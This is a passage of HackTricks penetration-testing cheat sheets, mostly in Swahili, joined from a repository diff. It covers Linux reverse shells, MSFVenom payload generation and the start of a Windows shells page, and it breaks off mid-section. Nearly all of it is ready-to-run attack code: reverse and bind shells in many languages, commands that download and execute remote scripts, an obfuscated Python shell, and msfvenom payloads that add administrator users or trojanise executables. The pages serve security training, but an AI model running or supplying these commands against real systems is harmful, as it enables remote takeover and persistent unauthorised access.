* Kwa **kuhamasisha pato na mwelekeo wa makosa kwenda kwenye faili hii**, amri hiyo kwa ufanisi inatuma pato la kikao cha shell ya kuingiliana kwenye mashine ya mshambuliaji.
4. **`0>&1`**: Sehemu hii ya amri **inaelekeza pembejeo ya kawaida (`stdin`) kwenda kwenye mahali pamoja na pato la kawaida (`stdout`)**.
### Unda kwenye faili na utekeleze
```bash
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
```
## Forward Shell
Wakati wa kushughulikia **Remote Code Execution (RCE)** udhaifu ndani ya programu ya wavuti inayotumia Linux, kupata reverse shell kunaweza kuzuia na ulinzi wa mtandao kama sheria za iptables au mifumo ya kuchuja pakiti ngumu. Katika mazingira kama haya, njia mbadala ni kuanzisha PTY (Pseudo Terminal) shell ili kuingiliana na mfumo ulioathirika kwa ufanisi zaidi.
Zana inayopendekezwa kwa ajili ya hili ni [toboggan](https://github.com/n3rada/toboggan.git), ambayo inarahisisha mwingiliano na mazingira ya lengo.
Ili kutumia toboggan kwa ufanisi, tengeneza moduli ya Python iliyoundwa kwa muktadha wa RCE wa mfumo wako wa lengo. Kwa mfano, moduli inayoitwa `nix.py` inaweza kuandikwa kama ifuatavyo:
```python3
import jwt
import httpx
def execute(command: str, timeout: float = None) -> str:
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
token = jwt.encode(
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
)
response = httpx.get(
url="https://vulnerable.io:3200",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
# ||BURP||
verify=False,
)
# Check if the request was successful
response.raise_for_status()
return response.text
```
Na kisha, unaweza kuendesha:
```shell
toboggan -m nix.py -i
```
Ili kutumia moja kwa moja shell ya mwingiliano. Unaweza kuongeza `-b` kwa ajili ya uunganisho wa Burpsuite na kuondoa `-i` kwa wrapper ya rce ya msingi zaidi.
Mwingine uwezekano ni kutumia utekelezaji wa shell ya mbele ya `IppSec` [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell).
Unahitaji tu kubadilisha:
* URL ya mwenyeji aliye hatarini
* Kichwa na kiambatisho cha payload yako (ikiwa ipo)
* Njia ambayo payload inatumwa (headers? data? taarifa za ziada?)
Kisha, unaweza tu **kutuma amri** au hata **kutumia amri ya `upgrade`** kupata PTY kamili (kumbuka kwamba mabomba yanapozungumziwa na kuandikwa kwa kuchelewesha takriban 1.3s).
## Netcat
```bash
nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```
## gsocket
Angalia kwenye [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
```bash
bash -c "$(curl -fsSL gsocket.io/x)"
```
## Telnet
```bash
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```
## Whois
**Mshambuliaji**
```bash
while true; do nc -l <port>; done
```
Ili kutuma amri, iandike, bonyeza enter na bonyeza CTRL+D (kuacha STDIN)
**Victim**
```bash
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
```
## Python
```bash
#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
```
## Perl
```bash
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
## PHP
```php
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```
## Java
```bash
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
## Ncat
```bash
victim> ncat <ip> <port,eg.443> --ssl -c "bash -i 2>&1"
attacker> ncat -l <port,eg.443> --ssl
```
## Golang
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```
## Lua
```bash
#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
## NodeJS
```javascript
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
or
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
or
// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
or
// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
## OpenSSL
Mshambuliaji (Kali)
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
```
Mtu Aliyeathiriwa
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
```
## **Socat**
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
### Bind shell
```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
```
### Reverse shell
```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```
## Awk
```bash
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
## Kidole
**Mshambuliaji**
```bash
while true; do nc -l 79; done
```
Ili kutuma amri, iandike, bonyeza enter na bonyeza CTRL+D (kuacha STDIN)
**Victim**
```bash
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
```
## Gawk
```bash
#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
```
## Xterm
Hii itajaribu kuungana na mfumo wako kwenye bandari 6001:
```bash
xterm -display 10.0.0.1:1
```
Ili kupata reverse shell unaweza kutumia (ambayo itasikiliza kwenye bandari 6001):
```bash
# Authorize host
xhost +targetip
# Listen
Xnest :1
```
## Groovy
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) KUMBUKA: Java reverse shell pia inafanya kazi kwa Groovy
```bash
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
## References
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell)
* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
**Jaribu Kikundi cha Usalama**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

240
generic-methodologies-and-resources/reverse-shells/msfvenom.md Normal file
View file

@ -0,0 +1,240 @@
# MSFVenom - CheatSheet
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na hunters wa bug bounty!
**Uelewa wa Hacking**\
Shiriki na maudhui yanayoangazia msisimko na changamoto za hacking
**Habari za Hack kwa Wakati Halisi**\
Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na uelewa wa wakati halisi
**Matangazo ya Hivi Punde**\
Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa
**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo!
***
## Msingi msfvenom
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
Mtu anaweza pia kutumia `-a` kubaini usanifu au `--platform`
## Orodha
```bash
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
```
## Paramu za kawaida wakati wa kuunda shellcode
```bash
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
```
## **Windows**
### **Reverse Shell**
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
```
{% endcode %}
### Bind Shell
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
```
{% endcode %}
### Unda Mtumiaji
{% code overflow="wrap" %}
```bash
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
```
{% endcode %}
### CMD Shell
{% code overflow="wrap" %}
```bash
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
```
### **Teua Amri**
{% code overflow="wrap" %}
```bash
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
```
### Encoder
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
```
{% endcode %}
### Imejumuishwa ndani ya executable
{% code overflow="wrap" %}
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
```
{% endcode %}
## Linux Payloads
### Reverse Shell
{% code overflow="wrap" %}
```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
```
{% endcode %}
### Bind Shell
{% code overflow="wrap" %}
```bash
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
```
### SunOS (Solaris)
{% code overflow="wrap" %}
```bash
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
```
{% endcode %}
## **MAC Payloads**
### **Reverse Shell:**
{% code overflow="wrap" %}
```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
```
### **Bind Shell**
```bash
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
```
{% endcode %}
## **Web Based Payloads**
### **PHP**
#### Reverse shel**l**
```bash
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
```
{% endcode %}
### ASP/x
#### Reverse shell
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
```
{% endcode %}
### JSP
#### Reverse shell
{% code overflow="wrap" %}
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
```
{% endcode %}
### WAZI
#### Reverse Shell
{% code overflow="wrap" %}
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
```
{% endcode %}
### NodeJS
```bash
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
```
## **Script Language payloads**
### **Perl**
{% code overflow="wrap" %}
```bash
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
```
### **Python**
```bash
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py
```
### **Bash**
```bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
```
{% endcode %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty!
**Uelewa wa Udukuzi**\
Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi
**Habari za Udukuzi za Wakati Halisi**\
Baki na habari za hivi punde katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi
**Matangazo ya Hivi Punde**\
Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa
**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo!
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

506
generic-methodologies-and-resources/reverse-shells/windows.md Normal file
View file

@ -0,0 +1,506 @@
# Shells - Windows
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
***
## Lolbas
Ukurasa [lolbas-project.github.io](https://lolbas-project.github.io/) ni wa Windows kama [https://gtfobins.github.io/](https://gtfobins.github.io/) ni wa linux.\
Kwa wazi, **hakuna faili za SUID au ruhusa za sudo katika Windows**, lakini ni muhimu kujua **jinsi** baadhi ya **binaries** zinaweza (kutumika) kutekeleza aina fulani ya vitendo visivyotarajiwa kama **kutekeleza msimbo wa kawaida.**
## NC
```bash
nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
## NCAT
mhasiriwa
```
ncat.exe <Attacker_IP> <PORT> -e "cmd.exe /c (cmd.exe 2>&1)"
#Encryption to bypass firewall
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe 2>&1)"
```
mshambuliaji
```
ncat -l <PORT>
#Encryption to bypass firewall
ncat -l <PORT eg.443> --ssl
```
## SBD
**[sbd](https://www.kali.org/tools/sbd/) ni mbadala wa Netcat unaoweza kubebeka na salama**. Inafanya kazi kwenye mifumo ya Unix kama na Win32. Ikiwa na vipengele kama vile usimbuaji mzito, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na kuunganishwa tena mara kwa mara, sbd inatoa suluhisho la kubadilika kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka kwa usambazaji wa Kali Linux linaweza kutumika kama mbadala wa kuaminika wa Netcat.
```bash
# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444
# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)
```
## Python
```bash
#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```
## Perl
```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
```bash
#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
## Lua
```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
## OpenSSH
Mshambuliaji (Kali)
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
```
Mtu aliyeathirika
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
```
## Powershell
```bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
```
Mchakato unaofanya wito wa mtandao: **powershell.exe**\
Payload imeandikwa kwenye diski: **HAPANA** (_angalau mahali popote ambapo ningeweza kupata kwa kutumia procmon !_ )
```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
Mchakato unaofanya wito wa mtandao: **svchost.exe**\
Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache**
**Mstari mmoja:**
```bash
